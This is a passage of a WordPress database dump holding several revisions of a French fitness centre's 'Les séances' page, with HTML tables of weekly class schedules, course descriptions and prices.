5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:53:40', '2013-07-03 17:53:40', '', 11, 'http://www.crosstrainingcenter.be/?p=202', 0, 'revision', '', 0),
(203, 1, '2013-07-03 17:54:00', '2013-07-03 17:54:00', '<h2>Team Training :</h2>\r\nLes séances sont programmées selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\">toto\r\ntiti\r\ntoutou</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:54:00', '2013-07-03 17:54:00', '', 11, 'http://www.crosstrainingcenter.be/?p=203', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(204, 1, '2013-07-03 17:57:10', '2013-07-03 17:57:10', '<h2>Team Training :</h2>\r\nLes séances sont programmées selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\">\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:57:10', '2013-07-03 17:57:10', '', 11, 'http://www.crosstrainingcenter.be/?p=204', 0, 'revision', '', 0),
(207, 1, '2013-07-03 18:03:14', '2013-07-03 18:03:14', '<h2>Team Training :</h2>\r\nLes séances sont programmées selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"><strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>Duo Training :</h2>\r\nUniquement sur rdv\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>Personal Training :</h2>\r\nUniquement sur rdv\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>Coatching nutritionnel :</h2>\r\nUniquement sur rdv\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 18:03:14', '2013-07-03 18:03:14', '', 11, 'http://www.crosstrainingcenter.be/?p=207', 0, 'revision', '', 0),
(208, 1, '2013-07-03 18:04:14', '2013-07-03 18:04:14', '<h2>Team Training :</h2>\r\nLes séances sont programmées selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td 